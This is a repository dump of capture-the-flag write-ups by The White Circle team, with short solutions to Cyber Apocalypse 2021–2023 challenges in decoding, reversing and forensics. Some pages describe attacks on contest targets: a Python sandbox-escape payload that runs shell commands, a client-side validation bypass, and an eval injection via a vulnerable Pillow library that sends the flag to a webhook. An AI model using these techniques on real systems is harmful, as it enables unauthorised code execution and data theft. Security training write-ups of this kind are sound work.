├── README.md
├── cyber_apocalypse_2021
├── README.md
├── crypto.md
├── crypto
│ ├── NintendoBase64.md
│ ├── PhaseStream1.md
│ └── SoulCrabber1.md
├── forensics.md
├── forensics
│ ├── AlienPhish.md
│ ├── Invitation.md
│ └── Oldesttrickinthebook.md
├── hardware.md
├── hardware
│ ├── Compromised.md
│ └── SerialLogs.md
├── index.html
├── misc.md
├── misc
│ ├── AlienCamp.md
│ ├── Inputasaservice.md
│ └── RoboticInfiltration.md
├── re.md
├── re
│ ├── Authenticator.md
│ └── Passphrase.md
├── robotic.gif
├── web.md
└── web
│ ├── Cass.md
│ ├── DAAS.md
│ ├── Inspectorgadget.md
│ ├── MiniSTRyplace.md
│ └── WildGooseHunt.md
├── cyber_apocalypse_2022
├── README.md
├── forensics.md
├── forensics
│ ├── Automation.md
│ ├── FreeServices.md
│ ├── GoldenPersistence.md
│ ├── IntergalacticRecovery.md
│ └── Puppeteer.md
├── index.html
├── pwn.md
├── pwn
│ └── SpacePirateGoingDeeper.md
├── re.md
├── re
│ ├── OmegaOne.md
│ └── WIDE.md
├── web.md
└── web
│ ├── AmidstUs.md
│ ├── Blinkerfluid.md
│ └── KrpytosSupport.md
├── cyber_apocalypse_2023
├── README.md
├── blockchain.md
├── blockchain
│ ├── Navigatingtheunknown.md
│ └── Shooting101.md
├── crypto.md
├── crypto
│ ├── AncientEncodings.md
│ ├── PerfectSynchronization.md
│ └── SmallStEps.md
├── forensics.md
├── forensics
│ ├── Aliencradle.md
│ ├── Artifactsofdisastroussightings.md
│ ├── Extraterrestrialpersistence.md
│ ├── InterstellarC2.md
│ ├── Packetcyclone.md
│ ├── PlaintextTleasure.md
│ ├── RelicMaps.md
│ └── Roten.md
├── hardware.md
├── hardware
│ ├── CriticalFlight.md
│ └── TimedTransmission.md
├── index.html
├── misc.md
├── misc
│ ├── Hijack.md
│ ├── Persistence.md
│ ├── RemoteComputation.md
│ └── Restricted.md
├── ml.md
├── ml
│ └── Reconfiguration.md
├── pwn.md
├── pwn
│ ├── GettingStarted.md
│ ├── InitialiseConnection.md
│ └── Questionnaire.md
├── re.md
├── re
│ ├── HuntingLicense.md
│ ├── NeedleinaHaystack.md
│ ├── ShatteredTablet.md
│ └── SheShellsCShells.md
├── web.md
└── web
│ ├── Drobots.md
│ ├── Gunhead.md
│ ├── Orbital.md
│ ├── Passman.md
│ └── TrappedSource.md
├── cyber_apocalypse_2024
├── README.md
├── crypto.md
├── crypto
│ ├── Dynastic.md
│ ├── Makeshift.md
│ └── PrimaryKnowledge.md
├── forensics.md
├── forensics
│ ├── AnUnusualsighting.md
│ ├── Confinement.md
│ ├── DataSiege.md
│ ├── FakeBoost.md
│ ├── GameInvitation.md
│ ├── ItHasBegun.md
│ ├── ObliqueFinal.md
│ ├── Phreaky.md
│ ├── Pursuethetracks.md
│ └── Urgent.md
├── hardware.md
├── hardware
│ ├── BunnyPass.md
│ └── Maze.md
├── index.html
├── misc.md
├── misc
│ ├── Character.md
│ ├── StopDropandRoll.md
│ └── Unbreakable.md
├── re.md
├── re
│ ├── Boxcutter.md
│ ├── LootStash.md
│ └── Packed.md
├── web.md
└── web
│ ├── FlagCommand.md
│ ├── KORPTerminal.md
│ ├── LabyrinthLinguist.md
│ ├── LockTalk.md
│ └── TimeKORP.md
├── cyber_apocalypse_2025
├── README.md
├── ai.md
├── ai
│ ├── CursedGateKeeper.md
│ ├── ElixirEmporium.md
│ ├── Embassy.md
│ ├── LunarOrb.md
│ └── MirrorWitch.md
├── blockchain.md
├── blockchain
│ ├── EldoriaGate.md
│ ├── Eldorion.md
│ └── HeliosDEX.md
├── coding.md
├── coding
│ ├── DragonFlight.md
│ ├── DragonFury.md
│ ├── EnchantedCipher.md
│ ├── SummonersIncantation.md
│ └── TheClockworkGuardian.md
├── crypto.md
├── crypto
│ ├── Hourcle.md
│ ├── Kewiri.md
│ └── Traces.md
├── forensics.md
├── forensics
│ ├── AnewHire.md
│ ├── CaveExpedition.md
│ ├── SilentTrap.md
│ ├── StealthInvasion.md
│ ├── TalesfortheBrave.md
│ ├── ThorinsAmulet.md
│ └── ToolPie.md
├── index.html
├── ml.md
├── ml
│ └── EnchantedWeights.md
├── osint.md
├── osint
│ ├── EchoesInStone.md
│ ├── HillsideHaven.md
│ ├── TheAncientCitadel.md
│ ├── TheMechanicalBirdsNest.md
│ ├── ThePoisonedScroll.md
│ ├── TheShadowedSigil.md
│ └── TheStoneThatWhispers.md
├── re.md
├── re
│ ├── EncryptedScroll.md
│ ├── ImpossiMaze.md
│ └── SealedRunes.md
├── web.md
└── web
│ ├── TrialbyFire.md
│ └── WhispersoftheMoonbeam.md
├── gpnctf_2024
├── crypto.md
├── crypto
│ └── nevergonnaletyoucrypto.md
├── index.html
├── pwn.md
├── pwn
│ └── NevergonnagiveyouUB.md
├── re.md
├── re
│ └── Nevergonnarunaroundandreverseyou.md
├── web.md
└── web
│ ├── Nevergonnatellalieandtypeyou.md
│ └── todo.md
├── hacktivitycon_2021
├── README.md
├── crypto.md
├── crypto
│ ├── Hexahedron.md
│ ├── N1TP.md
│ └── TRIFORCE.md
├── index.html
├── misc.md
├── misc
│ ├── BadWords.md
│ ├── Shelle.md
│ └── WORDCHURCH.md
├── mobile.md
├── mobile
│ ├── Reactor.md
│ └── Todo.md
├── osint.md
├── osint
│ └── ChallengeJedSheeran.md
├── pwn.md
├── pwn
│ └── ButterOverflow.md
├── scripting.md
├── scripting
│ └── UHAHA.md
├── warmups.md
├── warmups
│ ├── 2EZ.md
│ ├── Bass64.md
│ ├── ODDBALL.md
│ ├── Pimple.md
│ ├── SixFourOverTwo.md
│ ├── TSUNAMI.md
│ └── TargetPractice.md
├── web.md
└── web
│ ├── Confidentiality.md
│ ├── SWAGGY.md
│ └── Titanic.md
├── hsctf_2021
├── README.md
├── algo.md
├── algo
│ └── notreallymath.md
├── crypto.md
├── crypto
│ ├── aptenodytesforsteri.md
│ ├── opisthocomushoazin.md
│ └── queenofthehill.md
├── index.html
├── misc.md
├── misc
│ ├── Geographic1.md
│ ├── Geographic2.md
│ ├── cbrother1.md
│ ├── glasswindows.md
│ ├── palletsofgold.md
│ └── seededrandomizer.md
├── pwn.md
├── pwn
│ └── stonks.md
├── web.md
└── web
│ ├── DigitsofPi1.md
│ ├── NRCnorightclick.md
│ ├── bigblind.md
│ ├── grading.md
│ └── messageboard.md
├── index.html
├── m0lecon_2021
├── README.md
├── index.html
├── web.md
└── web
│ ├── KeyLottery.md
│ ├── LuckyFall.md
│ └── M0leFans.md
├── metasploit_2021
├── 10_of_clubs.md
├── 10_of_clubs
│ └── 10ofclubs.md
├── 2_of_spades.md
├── 2_of_spades
│ └── 2ofspades.md
├── 3_of_hearts.md
├── 3_of_hearts
│ └── 3ofhearts.md
├── 4_of_diamonds.md
├── 4_of_diamonds
│ └── 4ofdiamonds.md
├── 4_of_hearts.md
├── 4_of_hearts
│ └── 4ofhearts.md
├── 5_of_diamonds.md
├── 5_of_diamonds
│ └── 5ofdiamonds.md
├── 9_of_diamonds.md
├── 9_of_diamonds
│ └── 9ofdiamonds.md
├── README.md
├── ace_of_hearts.md
├── ace_of_hearts
│ └── aceofhearts.md
├── index.html
├── jack_of_hearts.md
└── jack_of_hearts
│ └── jackofhearts.md
├── nahamcon_2021
├── README.md
├── android.md
├── android
│ ├── Andra.md
│ └── Resourceful.md
├── crypto.md
├── crypto
│ ├── CarKeys.md
│ ├── DiceRoll.md
│ ├── EAXY.md
│ ├── Treasure.md
│ ├── chickenwings.md
│ ├── esab64.md
│ └── veebee.md
├── forensics.md
├── forensics
│ ├── Henpeck.md
│ ├── Parseltongue.md
│ ├── Typewriter.md
│ └── buzz.md
├── index.html
├── misc.md
├── misc
│ ├── PrisonBreak.md
│ ├── Zenith.md
│ └── eighthcircle.md
├── mission.md
├── mission
│ ├── Bionic.md
│ ├── Gus.md
│ ├── Hydraulic.md
│ ├── Leo.md
│ ├── LyraandOrion.md
│ ├── MeetTheTeam.md
│ ├── RECON.md
│ └── hercules.md
├── osint.md
├── osint
│ ├── GooglePlaySponsor.md
│ ├── INESponsor.md
│ └── intigritiSponsor.md
├── stego.md
├── stego
│ ├── Pollex.md
│ └── Shoelaces.md
├── twc_nahamcon_cert.png
├── web.md
└── web
│ ├── Echo.md
│ └── HomewardBound.md
├── nahamcon_2022
├── README.md
├── crypto.md
├── crypto
│ ├── BABYRSA.md
│ └── UNIMOD.md
├── index.html
├── keeber_security.md
├── keeber_security
│ ├── Keeber1.md
│ ├── Keeber2.md
│ ├── Keeber3.md
│ ├── Keeber4.md
│ ├── Keeber5.md
│ ├── Keeber6.md
│ ├── Keeber7.md
│ └── Keeber8.md
├── misc.md
├── misc
│ ├── Gossip.md
│ ├── SteamLocomotive.md
│ └── Tobeandnottobe.md
├── mobile.md
├── mobile
│ └── Mobilize.md
├── pwn.md
├── pwn
│ └── Babiersteps.md
├── warmups.md
├── warmups
│ ├── Quirky.md
│ ├── crashoverride.md
│ ├── exitvim.md
│ ├── flagcat.md
│ ├── prisoner.md
│ └── wizard.md
├── web.md
└── web
│ ├── EXtravagant.md
│ ├── JurrassicPark.md
│ └── Personnel.md
├── nahamcon_2024
├── README.md
├── crypto.md
├── crypto
│ └── MagicRSA.md
├── forensics.md
├── forensics
│ ├── 1337Malware.md
│ └── Breathofthewild.md
├── index.html
├── misc.md
├── misc
│ └── SecureSurfer.md
├── mobile.md
├── mobile
│ └── KittyKittyBangBang.md
├── re.md
├── re
│ └── RingCycleBasics.md
├── scripting.md
├── scripting
│ ├── Base3200.md
│ └── HashesonHashesonHashes.md
├── warmup.md
├── warmup
│ ├── QRRRRRRRR.md
│ ├── Readtherules.md
│ ├── Thatsnotmybase.md
│ ├── Twine.md
│ ├── Uriel.md
│ ├── copypasta.md
│ └── eicar.md
├── web.md
└── web
│ ├── AllAboutRobots.md
│ ├── HelpfulDesk.md
│ ├── MyShopDisaster.md
│ ├── TheDavinciCode.md
│ ├── TheHackerWebstore.md
│ ├── TheMissionPart1KnockKnock.md
│ ├── ThomasDEVerson.md
│ └── iDoor.md
├── nahamcon_2025
├── README.md
├── TheMission.md
├── TheMission
│ └── TheMission.md
├── crypto.md
├── crypto
│ └── Cryptoclock.md
├── devops.md
├── devops
│ └── TheBestButler.md
├── index.html
├── malware.md
├── malware
│ └── VerificationClarification.md
├── misc.md
├── misc
│ ├── Flagdle.md
│ ├── SSSH.md
│ └── TheMartian.md
├── nahamcon_2025_twc_cert-min.png
├── osint.md
├── osint
│ ├── SendingMixedSignals.md
│ └── TakentoSchool.md
├── warmup.md
├── warmup
│ ├── NahamCommencement2025.md
│ ├── Quartet.md
│ ├── Screenshot.md
│ └── TheOddyssey.md
├── web.md
└── web
│ ├── AdvancedScreening.md
│ ├── InfiniteQueue.md
│ ├── MethodintheMadness.md
│ ├── MyFirstCTF.md
│ ├── MySecondCTF.md
│ ├── MyThirdCTF.md
│ ├── NoSequel.md
│ ├── SNAD.md
│ └── TMCB.md
├── sdctf_2021
├── README.md
├── crypto.md
├── crypto
│ ├── Aprimehashcandidate.md
│ └── Lostintransmission.md
├── index.html
├── misc.md
├── misc
│ ├── AlternativeArithmetic.md
│ ├── AlternativeArithmeticFinalFlag.md
│ └── Noflagforyou.md
├── osint.md
├── osint
│ ├── SpeedStudying.md
│ ├── SpeedStudying2.md
│ ├── Thisflaghasbeenstolen.md
│ ├── hIDeandseek.md
│ └── hIDeandseek2.md
├── pwn.md
├── pwn
│ ├── FlagDropper.md
│ └── printFailed.md
├── re.md
├── re
│ └── Abowlofpythons.md
├── web.md
└── web
│ ├── Apollo1337.md
│ ├── GETSRequest.md
│ └── GitGood.md
├── sdctf_2022
├── README.md
├── crypto.md
├── crypto
│ └── Vinegar.md
├── forensics.md
├── forensics
│ ├── FlagTrafficker.md
│ └── Susanalbumparty.md
├── index.html
├── jail.md
├── jail
│ ├── rbashwarmup.md
│ └── rbashyetanothercalculator.md
├── misc.md
├── misc
│ ├── BishopDuel.md
│ └── Ishiharatest.md
├── osint.md
├── osint
│ ├── GoogleRansom.md
│ ├── MannHunt.md
│ ├── Partoftheship.md
│ ├── PaypalPlayboy.md
│ └── Samuel.md
├── pwn.md
├── pwn
│ └── Horoscope.md
├── web.md
└── web
│ └── Lotsoflogs.md
├── uiuctf_2021
├── README.md
├── crypto.md
├── crypto
│ ├── backtobasics.md
│ └── dhkeintro.md
├── forensics.md
├── forensics
│ ├── tablet1.md
│ └── tablet2.md
├── index.html
├── misc.md
├── misc
│ ├── CEO.md
│ ├── Emote.md
│ └── dootdoot.md
├── osint.md
├── osint
│ ├── ChaplinsPRNightmare1.md
│ ├── ChaplinsPRNightmare2.md
│ ├── ChaplinsPRNightmare3.md
│ ├── ChaplinsPRNightmare4.md
│ ├── ChaplinsPRNightmare5.md
│ ├── ChaplinsPRNightmare6.md
│ ├── ChaplinsPRNightmare7.md
│ ├── ChaplinsPRNightmare8.md
│ └── OSINTTheCreator.md
├── pwn.md
└── pwn
│ └── pwnwarmup.md
└── wpictf_2021
├── README.md
├── forensics.md
├── forensics
├── DFIR.md
└── Holmes.md
├── index.html
├── misc.md
├── misc
├── CastAway.md
└── Pokemon.md
├── pwn.md
├── pwn
└── m4h.md
├── re.md
├── re
└── BabysFirstReversing.md
├── stego.md
├── stego
├── Glute.md
└── Suspicioustraffic.md
├── web.md
└── web
├── wpiadmin.md
├── wpiadmin2.md
└── wpiadmin3.md
/README.md:
--------------------------------------------------------------------------------
1 | # CTF WriteUps by TWC
2 |
3 | * [Nahamcon 2025](nahamcon_2025/README.md)
4 | * [Cyber Apocalypse 2025](cyber_apocalypse_2025/README.md)
5 | * [Cyber Apocalypse 2024](cyber_apocalypse_2024/README.md)
6 | * [Cyber Apocalypse 2023](cyber_apocalypse_2023/README.md)
7 | * [Cyber Apocalypse 2022](cyber_apocalypse_2022/README.md)
8 | * [SDCTF 2022](sdctf_2022/README.md)
9 | * [Nahamcon 2022](nahamcon_2022/README.md)
10 | * [MetaSploit 2021](metasploit_2021/README.md)
11 | * [HacktivityCon 2021](hacktivitycon_2021/README.md)
12 | * [UIUCTF 2021](uiuctf_2021/README.md)
13 | * [HSCTF 2021](hsctf_2021/README.md)
14 | * [M0leCon 2021](m0lecon_2021/README.md)
15 | * [SDCTF 2021](sdctf_2021/README.md)
16 | * [WPICTF 2021](wpictf_2021/README.md)
17 | * [Cyber Apocalypse 2021](cyber_apocalypse_2021/README.md)
18 | * [Nahamcon 2021](nahamcon_2021/README.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve; this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [Web](web.md)
11 | * [Reverse Engineering](re.md)
12 | * [Hardware](hardware.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/crypto/NintendoBase64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Nintendo Base64 Writeup
4 | desc: Check out our writeup for Nintendo Base64 for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: crypto
9 | challenge: Nintendo Base64
10 | tags: "crypto, twh"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | Cyberchef recipe :
20 |
21 | ```json
22 | [
23 | { "op": "Find / Replace",
24 | "args": [{ "option": "Regex", "string": " " }, "", true, false, true, false] },
25 | { "op": "Find / Replace",
26 | "args": [{ "option": "Regex", "string": "\\n" }, "", true, false, true, false] },
27 | { "op": "From Base64",
28 | "args": ["A-Za-z0-9+/=", true] },
29 | { "op": "From Base64",
30 | "args": ["A-Za-z0-9+/=", true] },
31 | { "op": "From Base64",
32 | "args": ["A-Za-z0-9+/=", true] },
33 | { "op": "From Base64",
34 | "args": ["A-Za-z0-9+/=", true] },
35 | { "op": "From Base64",
36 | "args": ["A-Za-z0-9+/=", true] },
37 | { "op": "From Base64",
38 | "args": ["A-Za-z0-9+/=", true] },
39 | { "op": "From Base64",
40 | "args": ["A-Za-z0-9+/=", true] },
41 | { "op": "From Base64",
42 | "args": ["A-Za-z0-9+/=", true] }
43 | ]
44 | ```
45 |
46 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/forensics/Invitation.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Invitation Writeup
4 | desc: Check out our writeup for Invitation for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: forensics
9 | challenge: Invitation
10 | tags: "forensics, starry, vba"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved By : Starry-Lord
18 |
19 | * So we get a docm file.
20 | * I start by unzipping the Word document
21 | * We get a docm
22 | * Unzip it again and see folders
23 |
24 | 
25 |
26 | **PART 1**
27 |
28 | * First thing I tried to do after looking around was
29 |
30 | ```bash
31 | strings vbaProject.bin
32 | ```
33 |
34 | * Which gives back interesting hex lines.
35 |
36 | 
37 |
38 | * Then decode from hex (the lines are hex-encoded, not encrypted)
39 |
40 | 
41 |
42 | * Decoding the result as base64 with the URL-safe alphabet shows the following
43 |
44 | 
45 |
46 | ```
47 | CHTB{maldocs_are
48 | ```
49 |
50 | **PART 2**
51 |
52 | * Upload full vbaProject file this time and do the same as before.
53 |
54 | 
55 |
56 | * Use base64 urlsafe alphabet
57 | * We get second part of the flag by reversing
58 |
59 | ```
60 | _the_new_meta}
61 | ```
62 | ```
63 | CHTB{maldocs_are_the_new_meta}
64 | ```
65 |
66 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/hardware/Compromised.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Compromised Writeup
4 | desc: Check out our writeup for Compromised for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: hardware
9 | challenge: Compromised
10 | tags: "hardware, nigamelastic, salea"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Nigamelastic
18 |
19 | * Import the file into the Saleae logic analyzer software and use the I2C analyzer
20 | * Export the data and you will see two columns; if we take everything written and decode the hex, we get
21 |
22 | ```
23 | set_maCxH_lTimB{itn_tuo1:110_se73t_2mimn1_nli4mi70t_2to5:_1c0+.]<+/4~nr^_yz82Gb3b"4#kU_..4+J_5.
24 | ```
25 | ```
26 | 3M.2B1.4B.1dV_5. yS.5B7k3..1V.Qxm.!j.@Q52yq)t%# @5%md}S.
27 | ```
28 |
29 | * We can see the result is slightly off. I noticed the following:
30 |
31 | 
32 |
33 | * So I used only the `0x2C` entries and took their corresponding hex values,
34 |
35 | which is
36 |
37 | ```
38 | 0x43 0x48 0x54 0x42 0x7B 0x6E 0x75 0x31 0x31 0x5F 0x37 0x33 0x32 0x6D 0x31 0x6E 0x34 0x37 0x30 0x32 0x35 0x5F 0x63 0x34 0x6E 0x5F 0x38 0x32 0x33 0x34 0x6B 0x5F 0x34 0x5F 0x35 0x33 0x32 0x31 0x34 0x31 0x5F 0x35 0x79 0x35 0x37 0x33 0x6D 0x21 0x40 0x35 0x32 0x29 0x23 0x40 0x25 0x7D
39 | ```
40 |
41 | * and got the flag
42 |
43 | ```
44 | CHTB{nu11_732m1n47025_c4n_8234k_4_532141_5y573m!@52)#@%}
45 | ```
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/misc/Inputasaservice.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Input as a service Writeup
4 | desc: Check out our writeup for Input as a service for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: misc
9 | challenge: Input as a service
10 | tags: "misc, ava, python, jail, escape"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : ava
18 |
19 | * We are given a py-jail
20 | * https://programmer.help/blogs/python-sandbox-escape.html
21 | * I used this website as a reference. `os` and similar imports are banned, so we used string manipulation: the check evidently looks only at the literal input text, so a module name assembled at runtime gets past it
22 | * we just reverse the string `os` to `so`, import it, run the `ls` command to see `flag.txt`, and then `cat` the flag
23 | * the code to do this is given below
24 |
25 | ```bash
26 |
27 | __import__('so'[::-1]).system('ls')
28 |
29 |
30 | flag.txt
31 | input_as_a_service.py
32 |
33 |
34 | __import__('so'[::-1]).system('cat flag.txt')
35 |
36 | CHTB{4li3n5_us3_pyth0n2.X?!}
37 | ```
38 |
39 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/re/Passphrase.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Passphrase Writeup
4 | desc: Check out our writeup for Passphrase for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: re
9 | challenge: Passphrase
10 | tags: "re, chronocruz, ida"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by chronocruz.exe
18 |
19 | Disassembling the binary in IDA we reach the first code block where a certain portion of the code caught my eye
20 |
21 | 
22 |
23 | * So I wrote down the string given here
24 |
25 | ```
26 | 3xtr4t3rR3stR14L5_VS_hum4n5
27 | ```
28 |
29 | * Tried using this string in the program and voila!
30 |
31 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/robotic.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/cyber_apocalypse_2021/robotic.gif
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/web/Cass.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Cass Writeup
4 | desc: Check out our writeup for Cass for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: web
9 | challenge: Cass
10 | tags: "web, twh, js"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
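19 | * Input sanitization is performed only in the front end, via JavaScript
20 | * We can send the request through Burp Suite to bypass it, since client-side checks do not apply to a request that is edited or sent outside the browser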
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/web/Inspectorgadget.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Inspector gadget Writeup
4 | desc: Check out our writeup for Inspector gadget for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: web
9 | challenge: Inspector gadget
10 | tags: "web, bobby, ava, js"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Bobby sox and ava
18 |
19 | * Visiting the webpage we see a part of a flag: CHTB{
20 |
21 | * If we keep looking around the pages, we find in /static/js/main another part of the flag:
22 |
23 | ```
24 | us3full_1nf0rm4tion}
25 | ```
26 |
27 | * Combined with the part shown on the website, this is still not the complete flag.
28 | * static/css/main.css has another potential hint at the top: c4n_r3ve4l_
29 | * So far we have collected 3 pieces of the flag:
30 |
31 | ```
32 | 1. CHTB{
33 | 2. us3full_1nf0rm4tion}
34 | 3. c4n_r3ve4l_
35 | ```
36 |
37 | * in js.main we will also find the last piece of our flag:1nsp3ction_
38 | * the full flag ended up being :`CHTB{1nsp3ction_c4n_r3ve4l_us3full_1nf0rm4tion}`
39 |
40 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve; this is not a complete list.
6 |
7 | * [Forensics](forensics.md)
8 | * [Pwn](pwn.md)
9 | * [Web](web.md)
10 | * [Reverse Engineering](re.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/re/WIDE.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2022 | WIDE Writeup
4 | desc: Check out our writeup for WIDE for Cyber Apocalypse 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | parent: cyber_apocalypse_2022
8 | category: re
9 | challenge: WIDE
10 | tags: "re, ava, ghidra"
11 | date: 2022-05-21T00:00:00+00:00
12 | last_modified_at: 2022-05-21T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by - avantika(iamavu)
17 |
18 | We load the binary in Ghidra and look through the functions; the menu function was interesting
19 |
20 | 
21 |
22 | We look at the decompiled output, which shows a string; let’s try entering it when running the binary
23 |
24 | 
25 |
26 | and we get our flag
27 |
28 | 
29 |
30 | FLAG - `HTB{str1ngs_4r3nt_4lw4ys_4sc11}`
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/web/AmidstUs.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2022 | Amidst Us Writeup
4 | desc: Check out our writeup for Amidst Us for Cyber Apocalypse 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | parent: cyber_apocalypse_2022
8 | category: web
9 | challenge: Amidst Us
10 | tags: "web, twh, starry, taz, ava, legend, ssrf"
11 | date: 2022-05-21T00:00:00+00:00
12 | last_modified_at: 2022-05-21T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t, Starry-Lord, Taz34, Avantika, Legend
17 |
18 | 
19 |
20 | The downloadable files give us a few clues, in requirements.txt and util.py:
21 |
22 | * It’s a python environment
23 | * It uses a vulnerable version of the python Pillow library
24 |
25 | 
26 |
27 | https://github.com/python-pillow/Pillow/pull/5923
28 |
29 | link: [python-pillow/Pillow#5923](https://github.com/python-pillow/Pillow/pull/5923)
30 |
31 | This exchange provided some great insights on how to trigger SSRF
32 |
33 | In util.py we find that `eval` is called on data supplied in the POST request: the endpoint takes an uploaded image together with background RGB parameters.
34 |
35 | After some trial and error we managed to grab flag.txt and send it to our webhook by replacing one of the RGB values of “background”:
36 |
37 | 
38 |
39 | ```
40 | HTB{i_slept_my_way_to_rce}
41 | ```
42 |
43 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2023
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve; this is not a complete list.
6 |
7 | * [Blockchain](blockchain.md)
8 | * [Crypto](crypto.md)
9 | * [Forensics](forensics.md)
10 | * [Hardware](hardware.md)
11 | * [Machine Learning](ml.md)
12 | * [Misc](misc.md)
13 | * [Pwn](pwn.md)
14 | * [Reverse Engineering](re.md)
15 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Aliencradle.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Alien cradle Writeup
4 | desc: Check out our writeup for Alien cradle for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Alien cradle
10 | tags: "forensics, twh, powershell"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A powershell script is given
